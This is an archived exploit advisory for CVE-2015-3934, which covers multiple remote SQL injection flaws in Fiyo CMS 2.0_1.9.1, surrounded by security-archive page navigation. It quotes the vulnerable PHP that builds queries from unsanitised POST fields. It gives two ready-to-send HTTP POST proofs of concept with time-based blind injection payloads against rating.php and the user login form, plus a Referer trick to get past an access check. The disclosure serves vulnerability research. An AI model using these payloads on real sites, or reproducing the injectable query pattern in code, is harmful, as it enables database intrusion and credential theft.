Fiyo CMS 2.0_1.9.1 SQL Injection

Fiyo CMS 2.0_1.9.1 SQL Injection: Posted Jun 29, 2015; Authored by cfreer; Fiyo CMS version 2.0_1.9.1 suffers from multiple remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, sql injection; advisories | CVE-2015-3934; SHA-256 | 88134155e61bdad17b0695015d75b1a5facc81ef1cec5a352d986ba9cfb5b831; Download | Favorite | View

Fiyo CMS 2.0_1.9.1 SQL Injection

# Exploit Title: Fiyo CMS multiple SQL vulnerability
# Date: 2015-06-28
# Exploit Author: cfreer (poc-lab)
# Vendor Homepage:  http://www.fiyo.org/
# Software Link:
http://tcpdiag.dl.sourceforge.net/project/fiyo-cms/Fiyo%202.0/fiyo_cms_2.0.2.zip
# Version: 2.0_1.9.1
# Tested on: Apache/2.4.7 (Win32)
# CVE : CVE-2015-3934


1、

The vulnerable file is /apps/app_article/controller/rating.php, because the
rating.php includes jscore.php, so we must add referer in
HTTP Data Stream to bypass the limits of authority.when the 'do' equal
'rate' the vulnerable is same too.


require('../../../system/jscore.php');

if(!isset($_POST['id']))
header('../../../');
else {
$id = $_POST['id'];
 $db = new FQuery();
$db->connect();
$qrs = $db->select(FDBPrefix.'article','*',"id=$id");
$qrs = $qrs[0];


POC:

HTTP Data Stream

POST //fiyocms/apps/app_article/controller/rating.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101
Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:80/fiyocms/
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;
PHPSESSID=nl1e3jdfd8i7flnhffp37ro2s3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

do=getrate&id=182;select  sleep(5)  --



=====================================================================================================================================

2、

POC:

POST /fiyocms/user/login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101
Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;
PHPSESSID=4gl29hsns650jqj5toakt044h0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

user='%2B(select(0)from(select(sleep(5)))v)%2B'&pass=poc-lab&login=Login


The vulnerable file is \apps\app_user\sys_user.php

if(isset($_POST['login'])) {
$_POST['user'] = strip_tags($_POST['user']);
$qr = $db->select(FDBPrefix."user","*","status=1 AND user='$_POST[user]'
AND password='".MD5($_POST['pass'])."'");


The parameter of user is vulnerable. strip_tags doesn't work, Still can be
bypass.

Top Authors In Last 30 Days

Red Hat 213 files
Ubuntu 90 files
Gentoo 31 files
Debian 22 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Amit Roy 4 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

Fiyo CMS 2.0_1.9.1 SQL Injection

Fiyo CMS 2.0_1.9.1 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Fiyo CMS 2.0_1.9.1 SQL Injection

Share This

Fiyo CMS 2.0_1.9.1 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems